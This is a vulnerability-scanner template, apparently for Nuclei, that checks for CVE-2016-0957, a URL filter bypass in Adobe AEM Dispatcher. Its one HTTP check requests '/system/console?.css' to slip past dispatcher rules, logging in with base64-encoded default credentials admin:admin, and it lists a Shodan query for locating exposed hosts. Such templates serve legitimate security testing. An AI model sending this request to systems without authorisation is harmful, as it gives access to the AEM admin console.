id: CVE-2016-0957 info: name: Adobe AEM Dispatcher <4.15 - Rules Bypass author: geeknik severity: high description: Dispatcher before 4.1.5 in Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0 does not properly implement a URL filter, which allows remote attackers to bypass dispatcher rules via unspecified vectors. impact: | The vulnerability allows attackers to bypass security rules and potentially gain unauthorized access to sensitive information or perform malicious actions. remediation: | Upgrade to Adobe AEM Dispatcher version 4.15 or higher to fix the vulnerability. reference: - https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html - https://helpx.adobe.com/security/products/experience-manager/apsb16-05.html - https://nvd.nist.gov/vuln/detail/CVE-2016-0957 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2016-0957 epss-score: 0.03344 epss-percentile: 0.90435 cpe: cpe:2.3:a:adobe:dispatcher:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: adobe product: dispatcher shodan-query: http.component:"Adobe Experience Manager" tags: cve2016,cve,adobe,aem http: - method: GET path: - "{{BaseURL}}/system/console?.css" headers: Authorization: "Basic YWRtaW46YWRtaW4K" matchers-condition: and matchers: - type: word words: - "Adobe" - "java.lang" - "(Runtime)" condition: and - type: status status: - 200 # digest: 490a004630440220520f040769c98cb60f53407e7975797d6371673a762b8b82c4bcb83a5b9b817302201d7ae04d9ee8145a98818825b022733ac4ff220523c2e02da4539a555c3f5f45:922c64590222798bb761d5b6d8e72950